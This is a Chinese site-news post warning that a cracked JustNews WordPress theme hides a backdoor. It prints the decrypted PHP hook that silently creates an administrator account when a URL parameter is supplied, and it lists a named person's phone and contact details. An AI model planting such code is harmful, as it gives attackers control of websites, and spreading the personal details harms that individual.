[站长资讯] WordPress 主题JustNews破解版暗藏远程后门

115大咖1332022-06-23 01:02:00

JustNews免费版,JustNews破解版,JustNews免授权版,JustNews开心版,JustNews去授权版,JustNews去域名限制版,WordPress主题JustNews 破解版暗藏远程后门。JustNews主题专为博客、自媒体、资讯类的网站设计开发,自适应兼容手机、平板设备,支持前端用户中心,可以前端发布/投稿文章,同时主题支持专题功能,可以添加文章专题。

JustNews主题的functions.php文件解密后在48-61行发现后门代码

add_action('wp_head', 'wp_backdoor');
function wp_backdoor()
{
    if (
        md5($_GET['backdoor']) == '34d1f91fb2e514b8576fab1a75a89a6b'
    ) {
        require('wp-includes/registration.php');
        if (!username_exists('backdoor')) {
            $user_id = wp_create_user('backdoor', '123456');
            $user = new WP_User($user_id);
            $user->set_role('administrator');
        }
    }
}

连backdoor这么明显的后门变量命名都不改。同样的配方,同样的味道。

使用http(s)://你的域名/?backdoor=go访问

自动创建用户名为backdoor密码为123456的管理员账户

远程把账号密码发送到此域名 www.hoonews.net

备案号:粤ICP备16112674号-3性质:个人名称:殷晓可

电话:15724087667

QQ:1010006358

邮箱:[email protected]

用破解版 JustNews主题 的诸位,D盾并不能扫描出像这种专门针对WordPress的后门


D盾对我而言其实主要用来检测加密文件和查杀低级的木马,高级一点的其实很容易绕过查杀。


所以不要以为用D盾扫一下发现没有报毒就万事无忧了,而且作者真的要针对盗版还是比较容易的。


比如justnews激活就会将域名发到http://www.wpcom.cn/authentication/

[站长资讯] WordPress 主题JustNews破解版暗藏远程后门

ripro会将设置域名之类的信息发到vip.ylit.cc。


之前不是说ripro盗版收款收到别人账户上去了吗?是盗版传播者做的,还是其他人做的?自己好好想想。


友情小提示:

本站所有内容均由互联网收集整理、网友分享,我们不承担任何技术、责任及版权问题,资源测速后请24小时后删除!若您需要请您购买正版授权并合法使用,我们不对任何资源负法律责任。

资源失效请留言站长,压缩文件请在电脑上用最新版的好压或者360压缩软件解压,请勿在线解压,手机解压失败的勿扰。

网赚盘链接失效不补,要稳定请移步干净云或BT,BT比较推荐用xdown(https://xdown.org/)或Sharea(http://shareaza.sourceforge.net/)下载,也可用115、PikPak、uTorrent或BitComet下载。

网友评论

您需要 登录账户 后才能发表评论
精品推荐!
  • 最新文章
  • 热门文章
  • 热评文章
最新评论
热门标签
站点信息
  • 文章总数:15540
  • 页面总数:0
  • 分类总数:19
  • 标签总数:621
  • 评论总数:244
  • 浏览总数:1438257
友情链接